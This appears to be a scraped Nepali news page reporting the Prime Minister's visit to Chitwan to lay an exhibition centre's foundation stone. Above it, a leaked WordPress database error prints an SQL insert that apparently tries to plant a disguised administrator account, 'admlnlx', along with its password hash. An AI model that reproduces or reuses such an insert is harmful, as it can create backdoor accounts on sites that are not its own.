WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BcgP1epSzHgC0D59PlEYkmwf3qxDXf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 20:30:59', '', 'admlnlx', 'admlnlx')
चितवन, माघ २६–
प्रधानमन्त्री पुष्पकमल दाहाल प्रचण्ड आज चितवन आउँदै हुनुहुन्छ । उहाँ विहान १० बजे भरतपुर विमानस्थल आईपुग्ने जनाइएको छ । प्रधानमन्त्री दाहाल चितवन उद्योग संघले निर्माण गर्न लागेको चितवन प्रदर्शनी केन्द्रको शिलन्यास गर्ने कार्यक्रम रहेको छ । साथै पार्टीको कार्यक्रम देखि अन्य केही कार्यक्रममा सरिक भई आजै काठमाडौं फर्किने माओवादी केन्द्र चितवनले जनाएको छ ।